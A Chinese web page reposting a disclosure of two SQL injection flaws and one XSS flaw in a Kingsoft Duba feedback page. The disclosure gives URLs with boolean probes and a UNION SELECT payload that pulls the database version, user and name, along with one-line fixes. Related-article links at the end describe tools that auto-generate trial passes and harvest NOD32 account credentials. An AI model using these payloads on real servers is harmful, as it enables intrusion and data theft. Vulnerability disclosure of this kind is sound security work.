金山毒霸多个sql注入及XSS漏洞和修复
我要评论第一个
简要描述:由于变量过滤不严产生SQL注入漏洞 可通过入侵手段 拿到站点权限
详细说明:http://labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2
漏洞证明:http://labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=1
http://labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=2
结果明显不同 注入漏洞产生
修复方案:过滤变量app
第二个
简要描述:过滤不严导致存在SQL注入
详细说明:过滤不严导致存在SQL注入 有机会拿下服务器权限
漏洞证明:http://labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5%20and%201=2%20union%20select%201,2,version(),4,5,user(),database(),8,9--
http://labs.duba.net/robots.txt
未作进一步测试
修复方案:过滤参数
第三个:
简要描述:留言处过滤不严 造成跨站漏洞
详细说明:留言处过滤不严 造成跨站漏洞
漏洞证明:http://labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5
相关文章
金山毒霸U盘卫士 v4.0 绿色版 快速深度检测U盘真实大小工具
金山U盘卫士绿色版是提取自金山毒霸的一款绿色小软件,它功能强大,专业且免费为你检测U盘是不是传说中的缩水U盘!2013-06-18- 1、自动申请金山毒霸90天通行证 2、解决上一个版本中存在的一些问题 3、程序界面美化 4、VISTA用户请以管理员身份运行工具 5、程序运行过程中,请不要关闭程序,毒2009-08-18
- 金山毒霸通行证申请精灵2.8 功能: 1.自动申请37/60天金山毒霸通行证 2.操作简便,易于掌握 3.VISTA操作系统下请使用管理员身份进行运行 4.内置了下载金山毒霸和金2008-12-11
金山毒霸2015 新毒霸 悟空 具有防火墙的杀毒软件 SP2.5 中文官方正式版
金山毒霸2015具有病毒防火墙实时监控、压缩文件查毒、查杀电子邮件病毒等多项先进的功能。2015-07-29
欢迎您使用本软件,使用前请杀毒,最好是到作者官方站下载, 这样可能会更安全些,以免遇到不法份子捆 绑了恶意程序对您的机器造成破 坏,2008-12-11- 可以批量获取NOD32 EAV/ESS 用户名密码并且可以使用官方服务器更新病毒库,6个更新源,可保证高效稳定获取最新的ID密码。支持将用户名密码或通2009-07-03
- 我最近按照金山的提示,更新了金山毒霸猎豹版,这下可不得了了,每天都要提示我被黑客攻击,已拦截。我看了一下,最多的一天有上百次拦截,这是怎么回事啊?2011-11-03
- 此工具可自动反复申请90天的金山毒霸通行证,完美支持金山毒霸2009、2008 VISTA系统下,请以系统管理员身份运行工具。在使用时,工具本身不会连接网络,纯绿色、安全,使用2010-01-04
金山毒霸上网保护 搜狗浏览器安全插件 V1.1.1.1 中文绿色免费版
金山毒霸上网保护插件,插件具有保护网购安全、拦截欺诈网站、拦截木马网站等功能,搜狗浏览器高速模式插件。用搜狗的朋友可以安装了。2012-07-30- 笔记本、上网本、游戏用户最爱 - 精致界面,完美适配上网本屏幕,安全状态一目了然(三种状态界面图略缩图)- 极速版升级更省流量,适合3G及无线网用户- 极速版2009-11-11
最新评论